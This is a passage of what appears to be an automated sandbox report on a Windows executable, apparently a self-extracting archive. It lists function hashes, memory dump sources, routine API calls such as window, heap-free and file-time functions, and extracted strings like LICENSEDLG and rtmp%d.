                                                                                              • Instruction ID: 81e93a4f12bc2af00d2298141c805f377900733362602835ce7f82e45066916c
                                                                                              • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                                                                              • Instruction Fuzzy Hash: 52621971604B899FCB29CF38C8906BABBE1AF55304F04C56DD8DA8B386D7B4E955CB10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                                                                              • Instruction ID: f58c76883ffe3ab055c4eece95c9ecd8e84059fe1f79f12a35864f3b2777a68b
                                                                                              • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                                                                              • Instruction Fuzzy Hash: 64620370A0878A9FC719CF28C8905B9BBE1BB55304F14866EE8D6877C2D770F956CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                                                                              • Instruction ID: 29100b06fcd09d12f96339f719fa8eef6238f243b72715903c815102a771d238
                                                                                              • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                                                                              • Instruction Fuzzy Hash: 7D524AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3bf72ac6219ba12e88e0081aa232042784c4f114fea62c638d4e248c5c6fcfbf
                                                                                              • Instruction ID: 19b35d323678f6627fcf0f83d80146863b69e5a496cedf49902bd2a98bf1275f
                                                                                              • Opcode Fuzzy Hash: 3bf72ac6219ba12e88e0081aa232042784c4f114fea62c638d4e248c5c6fcfbf
                                                                                              • Instruction Fuzzy Hash: 6812C0B17047068BC728DF28C9906B9B3E1FB54308F14892EE5DBC7AC5D7B4A8A5CB45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode Fuzzy Hash: 14bfd935503cc7046d2e6c57629f284704955d8d646eb54ece8f00347676bf1c
                                                                                              • Instruction Fuzzy Hash: 0B818E822192D8AECF564F7D38E42B93FE25733740B1941BAC5C686AB3C53646DCE721
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8e4a73a1c101b28ffc49550f3124e98516079192fd86b227a10dfc2d82888b80
                                                                                              • Instruction ID: c3019127c6a076ab40a6d64663859e556c4b9af08b23880ac3ad3569e802ecc3
                                                                                              • Opcode Fuzzy Hash: 8e4a73a1c101b28ffc49550f3124e98516079192fd86b227a10dfc2d82888b80
                                                                                              • Instruction Fuzzy Hash: 4F51AE3150C3D94FC712CF28D1844BEBFE1AF9A314F59489EE5D54B623D220A649EBA3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7af1664b22dccedb6e7a348c189a8a6efdafeac722dbe5bebdd006a8ec75283f
                                                                                              • Instruction ID: bc72f295810a24e8d00514a749da39f20d3e1e7dd871a3520cdd5835c4832f68
                                                                                              • Opcode Fuzzy Hash: 7af1664b22dccedb6e7a348c189a8a6efdafeac722dbe5bebdd006a8ec75283f
                                                                                              • Instruction Fuzzy Hash: 2A512671A083068BC748CF19D48059AF7E1FF88354F058A2EE899E7740DB34E959CB96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                                                                              • Instruction ID: 443d94afcfe37b9cf73e19ff28659ab3d1ea19c918c8be20a20bf175862bd337
                                                                                              • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                                                                              • Instruction Fuzzy Hash: 6B31C4B17047498FC714EE28C8516AABBE0FB95300F10492EE5D9C7742C775EA49CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8e7a16291192047ad6f1ee974384d6110a37a65729c1481ab0c5a7c121157e9b
                                                                                              • Instruction ID: c0d7d33edf4dfe01b3d46b21ad593d7bad10ad14d9532319f7b1266b2214bf1f
                                                                                              • Opcode Fuzzy Hash: 8e7a16291192047ad6f1ee974384d6110a37a65729c1481ab0c5a7c121157e9b
                                                                                              • Instruction Fuzzy Hash: 61210A32A201255BCB58CF2DEC9043677E1B78A311746813FEB428BAD0C535E966D7A0
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 000FDABE
                                                                                                • Part of subcall function 000F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F401D
                                                                                                • Part of subcall function 00101596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00130EE8,00000200,000FD202,00000000,?,00000050,00130EE8), ref: 001015B3
                                                                                              • _strlen.LIBCMT ref: 000FDADF
                                                                                              • SetDlgItemTextW.USER32(?,0012E154,?), ref: 000FDB3F
                                                                                              • GetWindowRect.USER32(?,?), ref: 000FDB79
                                                                                              • GetClientRect.USER32(?,?), ref: 000FDB85
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 000FDC25
                                                                                              • GetWindowRect.USER32(?,?), ref: 000FDC52
                                                                                              • SetWindowTextW.USER32(?,?), ref: 000FDC95
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 000FDC9D
                                                                                              • GetWindow.USER32(?,00000005), ref: 000FDCA8
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 000FDCD5
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 000FDD47
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                              • String ID: $%s:$CAPTION$d
                                                                                              • API String ID: 2407758923-2512411981
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 0011C277
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE2F
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE41
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE53
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE65
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE77
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE89
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE9B
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BEAD
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BEBF
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BED1
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BEE3
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BEF5
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BF07
                                                                                              • _free.LIBCMT ref: 0011C26C
                                                                                                • Part of subcall function 001184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?), ref: 001184F4
                                                                                                • Part of subcall function 001184DE: GetLastError.KERNEL32(?,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?,?), ref: 00118506
                                                                                              • _free.LIBCMT ref: 0011C28E
                                                                                              • _free.LIBCMT ref: 0011C2A3
                                                                                              • _free.LIBCMT ref: 0011C2AE
                                                                                              • _free.LIBCMT ref: 0011C2D0
                                                                                              • _free.LIBCMT ref: 0011C2E3
                                                                                              • _free.LIBCMT ref: 0011C2F1
                                                                                              • _free.LIBCMT ref: 0011C2FC
                                                                                              • _free.LIBCMT ref: 0011C334
                                                                                              • _free.LIBCMT ref: 0011C33B
                                                                                              • _free.LIBCMT ref: 0011C358
                                                                                              • _free.LIBCMT ref: 0011C370
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 0010CD51
                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0010CD7D
                                                                                                • Part of subcall function 001017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,000FBB05,00000000,.exe,?,?,00000800,?,?,001085DF,?), ref: 001017C2
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0010CD99
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0010CDB0
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0010CDC4
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0010CDED
                                                                                              • DeleteObject.GDI32(00000000), ref: 0010CDF4
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0010CDFD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              • API String ID: 3820355801-1882779555
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00118EC5
                                                                                                • Part of subcall function 001184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?), ref: 001184F4
                                                                                                • Part of subcall function 001184DE: GetLastError.KERNEL32(?,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?,?), ref: 00118506
                                                                                              • _free.LIBCMT ref: 00118ED1
                                                                                              • _free.LIBCMT ref: 00118EDC
                                                                                              • _free.LIBCMT ref: 00118EE7
                                                                                              • _free.LIBCMT ref: 00118EF2
                                                                                              • _free.LIBCMT ref: 00118EFD
                                                                                              • _free.LIBCMT ref: 00118F08
                                                                                              • _free.LIBCMT ref: 00118F13
                                                                                              • _free.LIBCMT ref: 00118F1E
                                                                                              • _free.LIBCMT ref: 00118F2C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: e39a156ceeb6e2bb673ed8192fc224a7de1878f29ba3372c1fcf039cec387b85
                                                                                              • Instruction ID: 07d6ff147612d53e8fa7a2314ed68189cbcf2a69b1b00de6ccada319f6191d34
                                                                                              • Opcode Fuzzy Hash: e39a156ceeb6e2bb673ed8192fc224a7de1878f29ba3372c1fcf039cec387b85
                                                                                              • Instruction Fuzzy Hash: C511A77650010DAFCB29EF94D942DDE3B65FF24350B5181A5B9084B926DF31DA919B80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                              • API String ID: 0-2277559157
                                                                                              • Opcode ID: d45baba41763784845b229d19c2e98b2940d38634f725cb7baa4ac7ecc0ed7df
                                                                                              • Instruction ID: ab8e3bb1028967cb0c9156a4b9544ffc495601bc539071272cebb379101311a0
                                                                                              • Opcode Fuzzy Hash: d45baba41763784845b229d19c2e98b2940d38634f725cb7baa4ac7ecc0ed7df
                                                                                              • Instruction Fuzzy Hash: A7F1167160834C5BDB15EF348996BFE77D96F90300F080479FB85CBA83DA649948E7A2
                                                                                              APIs
                                                                                                • Part of subcall function 000F130B: GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                                • Part of subcall function 000F130B: SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              • EndDialog.USER32(?,00000001), ref: 0010AD20
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0010AD47
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0010AD60
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0010AD71
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 0010AD7A
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0010AD8E
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0010ADA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                              • String ID: LICENSEDLG
                                                                                              • API String ID: 3214253823-2177901306
                                                                                              • Opcode ID: ed9baadd805f2400e78ab872f8b8b7cee356f995963337089234515c0dc579c3
                                                                                              • Instruction ID: 9ff19b3373042cdbcd9aaf20dacb009bd5f5998aaef8b0fca6ae8fb0610ea745
                                                                                              • Opcode Fuzzy Hash: ed9baadd805f2400e78ab872f8b8b7cee356f995963337089234515c0dc579c3
                                                                                              • Instruction Fuzzy Hash: 3421B432240304BBD2255FA1EC49E7B3B6DFB4BB57F010014F685A6CE0DBA2A980D732
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F9448
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 000F946B
                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 000F948A
                                                                                                • Part of subcall function 001017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,000FBB05,00000000,.exe,?,?,00000800,?,?,001085DF,?), ref: 001017C2
                                                                                              • _swprintf.LIBCMT ref: 000F9526
                                                                                                • Part of subcall function 000F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F401D
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 000F9595
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 000F95D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                              • String ID: rtmp%d
                                                                                              • API String ID: 2111052971-3303766350
                                                                                              • Opcode ID: 1a3fb88f2b13920ebd509d66c7b80e12b137d89c9e2807f05553e5d6b731b2b4
                                                                                              • Instruction ID: d4832c3091932d3dad5be9eb4b6106d047704b20a155cec7e4cfd073724efc72
                                                                                              • Opcode Fuzzy Hash: 1a3fb88f2b13920ebd509d66c7b80e12b137d89c9e2807f05553e5d6b731b2b4
                                                                                              • Instruction Fuzzy Hash: FE413E7190025C76CB30EBA08C85AFF73BCAF55780F0444A5B649E3452EB749B89EFA4
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00108F38
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00108F59
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00108F80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                              • API String ID: 4094277203-4209811716
                                                                                              • Opcode ID: d710ca9dd2d38494e33539f1c1a403d4e40329b4392b1dfdceac9e8c24a0fdea
                                                                                              • Instruction ID: bbd8c3549563931d53cd4f1fcc861895103e976d72162b0a8905b45b826c2d51
                                                                                              • Opcode Fuzzy Hash: d710ca9dd2d38494e33539f1c1a403d4e40329b4392b1dfdceac9e8c24a0fdea
                                                                                              • Instruction Fuzzy Hash: 6A315B7254C3127BD728BB34DC06FAF7769EF61760F000129F8D1962C2EFA49A5983A1
                                                                                              APIs
                                                                                              • __aulldiv.LIBCMT ref: 00100A9D
                                                                                                • Part of subcall function 000FACF5: GetVersionExW.KERNEL32(?), ref: 000FAD1A
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00100AC0
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00100AD2
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00100AE3
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00100AF3
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00100B03
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00100B3D
                                                                                              • __aullrem.LIBCMT ref: 00100BCB
                                                                                              Memory Dump Source
